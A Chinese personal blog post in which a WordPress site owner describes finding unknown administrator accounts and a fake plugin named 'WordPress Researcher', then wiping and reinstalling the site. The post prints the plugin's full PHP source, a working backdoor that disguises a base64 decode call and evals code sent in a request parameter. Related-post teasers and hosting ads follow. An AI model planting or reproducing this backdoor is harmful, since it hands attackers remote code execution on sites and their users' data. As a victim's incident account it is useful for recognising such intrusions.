被黑了?

早上起来,帮嫦子发了篇文章。选择作者的时候,发现多了几个不知名(肯定不是我自己注册的、另外也关闭注册了的)的作者,吓了一跳。

检查了一遍,数据没丢失,那些管理员全部都是2010年3月19号注册的。检查插件,发现多了一个叫 WordPress Researcher 的东东(文件最后修改日期是20141113)。哎,杯具了。就这么个破站,有啥好搞的呢?


那插件就一个文件,附上代码,不知道有啥用。

<?php
/*
Plugin Name: WordPress Researcher
Plugin URI: http://wordpress.org/extend/plugins/
Description: WordPress research tool.
Author: wordpressdotorg
Author URI: http://wordpress.org/
Text Domain: wordpress-researcher
License: GPL version 2 or later - http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
Version: 2.2.4
*/
function research_plugin()
{
if (isset($_REQUEST['X3PN']))
{
$myfunc = 'bas'.'e64_'.'dec'.'ode';
$myvar = $myfunc($_REQUEST['X3PN']);
eval($myvar);
}
return;
}

add_action('after_setup_theme', 'research_plugin');
?>

程序文件全部删掉了,导出了xml,数据库也不要了,重新安装导入了文章和评论内容,主题也重新检查了一遍,折腾大半天,终于又差不多回复原貌了。才发现,友链忘了备份了!又得手工整理一遍,累!

本文首发于:被黑了?-垃圾站

除非注明,垃圾站文章均为网络收集,本文地址 https://cyhour.com/135/,转载时烦请以链接形式注明原始出处。
声明:我们不销售主机,选主机需合法使用。任何主机需定期备份,防止数据丢失。信息以实际为准,评测仅供参考不代表权威!
🍄:Netflix 奈飞 YouTube 合租

WordPress 4.2+ 使用 Twemoji 替换默认 Emoji 表情

WordPress 4.2+ 新增 Twitter Em❤️ji 表情,但是默认使用的 CDN —— https://s.w.org/images/core/emoji/11.2.0/72x72/ 在国内无法正常访问。解决办法有两个,一是把表情本地化,二是替换掉默认的链接。 🎉 😜 👯 🍻 🎈 🎤 🎮 🚀 🌉 ✨ 使用 Twitter 官方提供 MaxCDN 服务 Twitter 官方提供 MaxCDN 服务…
浏览: 155 标签:  ,  ,  ,  , 

WordPress 随机显示名人格言 + PHP 毒鸡汤

在 编程随想 博客看到个不错的功能——随机显示博主精选的名人格言,稍稍折腾,我也加上了这功能了(在首页随机显示我喜欢的句子)。 :razz: 网上(官网的是英文版的格言)有现成的插件。一个很简单的插件,其实可以集成到 functions.php 去。不过格言也存放在插件的php文件里面,集成到 functions.…
浏览: 62 标签:  ,  ,  , 

Gravatar 头像被墙及解决方案

Gravatar 头像真是一言难尽,时而正常时而抽风时而无法访问……就一个 Gravatar 头像,这有啥好强(现代通假字)的呢?(据说是被其它服务连累?) 解决办法 - 调用 ssl/cn 头像链接 历史解决办法:调用 ssl 头像链接——https还是没被墙的,而且速度还不错,直接调用这个最简单了。主题 functions.…
浏览: 137
浏览: 31

Comments:0

发表留言

Vultr 送$100,搬瓦工年付最低$49,优惠码 BWH3HYATVBJW,更多推荐VPS信息